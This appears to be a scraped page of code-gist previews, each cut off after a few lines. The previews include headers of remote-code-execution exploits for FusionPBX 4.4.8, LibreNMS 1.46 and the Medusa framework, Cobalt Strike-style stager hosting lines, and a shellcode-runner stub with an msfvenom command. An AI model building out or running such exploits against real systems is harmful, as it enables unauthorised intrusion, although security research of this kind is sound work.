This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdint.h> | |
#include <inttypes.h> | |
#include <winsock2.h> | |
#include <windns.h> | |
#include <windows.h> | |
#include <stdio.h> | |
#include <tlhelp32.h> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
site_host(localip(), 80, "/ab2g", "TEXT", "text/html", "Stager Override", false); | |
site_host(localip(), 443, "/ab2g", "TEXT", "text/html", "Stager Override", true); | |
site_host(localip(), 80, "/ab2h", "TEXT", "text/html", "Stager Override", false); | |
site_host(localip(), 443, "/ab2h", "TEXT", "text/html", "Stager Override", true); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import requests | |
import json | |
import time | |
import paramiko | |
from Crypto.PublicKey import RSA | |
from os import chmod | |
public_key_name = "test1.key" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ~/.bashrc: executed by bash(1) for non-login shells. | |
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) | |
# for examples | |
alias python3=python3.6 | |
# If not running interactively, don't do anything | |
[ -z "$PS1" ] && return | |
# don't put duplicate lines in the history. See bash(1) for more options | |
# ... or force ignoredups and ignorespace | |
HISTCONTROL=ignoredups:ignorespace |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class MetasploitModule < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'FusionPBX v4.4.8 authenticated Remote Code Execution', | |
'Privileged' => true, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
''' | |
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution | |
# Date: 24/12/2018 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : CVE-2018-20434 | |
# Vendor Homepage: https://www.librenms.org/ | |
# Version: v1.46 | |
# Tested on: Ubuntu 18.04 / PHP 7.2.10 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
int main(int argc, char **argv){ | |
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!usr/bin/python | |
''' | |
Description : find any windows function address from any DLL | |
Author : Askar @mohammadaskar2 | |
''' | |
from ctypes import windll | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
''' | |
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE | |
# Date: 16/08/2018 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : CVE-2018-15577 - RESERVED | |
# Vendor Homepage: https://github.com/USC-NSL/Medusa/ | |
# Version: V1.0 | |
# Tested on: Ubuntu 16.04 / PHP 7.0.28 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
''' | |
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE | |
# Date: 16/08/2018 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : CVE-2018-15577 - RESERVED | |
# Vendor Homepage: https://github.com/USC-NSL/Medusa/ | |
# Version: V1.0 | |
# Tested on: Ubuntu 16.04 / PHP 7.0.28 |